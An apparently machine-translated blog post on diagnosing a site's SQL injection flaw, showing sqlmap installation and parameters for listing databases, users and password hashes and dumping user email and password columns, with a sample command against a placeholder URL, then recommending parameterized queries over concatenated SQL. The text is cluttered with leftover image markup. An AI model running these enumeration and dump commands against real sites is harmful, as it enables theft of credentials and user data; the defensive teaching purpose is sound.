Analysis and solution of site SQL injection problem

1, the problem: the site is injected into SQL, you can see the use of libraries, tables, and data conditions

2, solve: the front and rear reinforcement, while the underlying SQL query must use parameterized

Injection analysis using tool: Sqlmap

First, install the Sqlmap tool

1, before the installation, you need to install the Python environment, installation reference: http://blog.csdn.net/baigoocn/article/details/51456721 above has instructions

2. Download the Sqlmap Toolkit and place the files in the Sqlmap directory under the installation directory of the Python environment,

Enter sqlmap.py-h to view information to prompt installation success

3. Common parameters

- u: Specify the injection point URL

--dbs:dbs Front two bars ( all database names)

--current-db The database currently in use by the Web

--current-user Web database usage account

--users All users

--passwords Database account and password

-D tourdata --tables: Specify database name --tables: List table

-D tourdata-t UserB--columns-d: Specify database name -T: Specify table to list fields --columns: Specify list fields

-D tourdata-t userb-c "Email,username,userpassword"--dump-c: Specify fields to be burst--dump: Export the results

--start 1--stop 10 Specifies to export a specific range of field content--start: Specify the beginning of the row--stop: Specify the end of the row

(Reference: http://blog.csdn.NET/zgyulongfei/article/details/41017493)

--current-db --current-user

650) this.width=650; "src="/e/u261/themes/default/images/spacer.gif "border=" 0 "style=" Background:url ("/e/u261/ Lang/zh-cn/images/localimage.png ") no-repeat center;border:1px solid #ddd;" alt= "Spacer.gif"/>

D:\python27\sqlmap>sqlmap.py-u http://xxx.com/cms/xxx_view.aspx?cpn_id=fb509dacdd224a179fde6e71e824ec95 - -current-db

650) this.width=650; "src="/e/u261/themes/default/images/spacer.gif "border=" 0 "style=" Background:url ("/e/u261/ Lang/zh-cn/images/localimage.png ") no-repeat center;border:1px solid #ddd;" alt= "Spacer.gif"/>650) this.width=650 ; "Src=" Https://s2.51cto.com/wyfs02/M00/A7/72/wKioL1nmznzRw9bgAADFm3oPiAs228.png "title=" 320a6db6-533a-4a56-8c70-ec5d9e2da695.png "alt=" Wkiol1nmznzrw9bgaadfm3opias228.png "/>

--users

650) this.width=650; "src="/e/u261/themes/default/images/spacer.gif "border=" 0 "style=" Background:url ("/e/u261/ Lang/zh-cn/images/localimage.png ") no-repeat center;border:1px solid #ddd;" alt= "Spacer.gif"/>

-D Fjhba--tables

650) this.width=650; "src="/e/u261/themes/default/images/spacer.gif "border=" 0 "style=" Background:url ("/e/u261/ Lang/zh-cn/images/localimage.png ") no-repeat center;border:1px solid #ddd;" alt= "Spacer.gif"/>

There are more parameters to get to the relevant information content

From the above operation to execute, equivalent to the data is completely checked, this is very dangerous!

Splicing is not allowed when writing any SQL statement!

650) this.width=650; "src="/e/u261/themes/default/images/spacer.gif "border=" 0 "style=" Background:url ("/e/u261/ Lang/zh-cn/images/localimage.png ") no-repeat center;border:1px solid #ddd;" alt= "Spacer.gif"/>

650) this.width=650; "src="/e/u261/themes/default/images/spacer.gif "border=" 0 "style=" Background:url ("/e/u261/ Lang/zh-cn/images/localimage.png ") no-repeat center;border:1px solid #ddd;" alt= "Spacer.gif"/>

There is a risk of injection in this notation.

650) this.width=650; "src=" http://blog.51cto.com/e/u261/themes/default/images/spacer.gif "border=" 0 "style=" white-space:normal;border:1px solid RGB (221,221,221); Background-image:url ("/e/u261/lang/zh-cn/images/ Localimage.png "); background-position:50% 50%;background-repeat:no-repeat;" alt= "Spacer.gif"/>select * from TableA where col1 = ' + ColId + ';

To use Parameter form: parameter

This article is from the "Frog Qing" blog, please be sure to keep this source http://wuxueqing.blog.51cto.com/13389311/1973704

Analysis and solution of site SQL injection problem